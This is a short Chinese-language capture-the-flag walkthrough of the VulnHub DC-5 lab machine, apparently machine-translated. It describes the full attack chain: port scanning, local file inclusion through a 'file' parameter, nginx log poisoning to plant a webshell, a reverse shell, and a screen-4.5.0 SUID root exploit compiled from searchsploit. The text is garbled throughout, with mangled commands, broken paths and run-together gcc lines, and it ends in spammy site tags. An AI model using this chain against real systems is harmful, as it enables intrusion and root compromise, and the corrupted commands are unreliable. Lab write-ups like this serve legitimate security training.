准备工作在vulnhub官网下载dc:5无人机dc-5。
信息收集nmap -a -t4 -sv -p-192.168.1.14可以看出开放端口较少。经过查询,111端口发现没有任何东西可以访问80端口。
观察页面,发现联系人页面可以提交东西。
但是刷新几次后,你会发现后面的时间会发生变化,说明页面是动态的,可能包含文件。
测试没有问题。这里有两点需要说明:文件和foot测试可以一个一个做。footer.php在这里被认为是一个暗示。其实还是需要一个强大的目录字典和目录扫描工具(burpsuit也可以)来猜测。
该文件包含一个试图包含nginx的日志文件。默认的日志路径是/var/log/var/log/nginx/access . log
成功!/hackyou然后用蚂蚁剑连接 192 . 168 . 1 . 14/thank you . php?file=/var/log/nginx/access.log打开虚拟终端,弹回外壳。这个外壳不稳定。
然后用python弹壳。
python-c 导入ptypty.spawn。;/bin/bash ;) 权限提升检查是否有无密码root权限,进入命令行。
find/-perm -u=s -type f 2/dev/null发现screen-4.5.0可疑。尝试使用searchsploit搜索漏洞。
searchsploit -p 41154.sh查看位置cp/usr/share/exploited b/exploited b/linux/local/41154 . sh/tmp复制到/tmp目录分别编译两个短代码。
gcc-fpic-shared-ldl-otmp/lib hax . sotmp/lib hax . cgcc-otmp/rootshelltmp/rootshellc,然后用ant sword把文件上传到目标机/tmp目录下,安装在sh脚本上执行获取shell获取标志。
参考文1_ry-dc-5靶机对红小豆饼的侵彻记录_dc-5。
标签:
目标文件
了解更多dc-5v(dc5v是什么意思)相关内容请关注本站点。
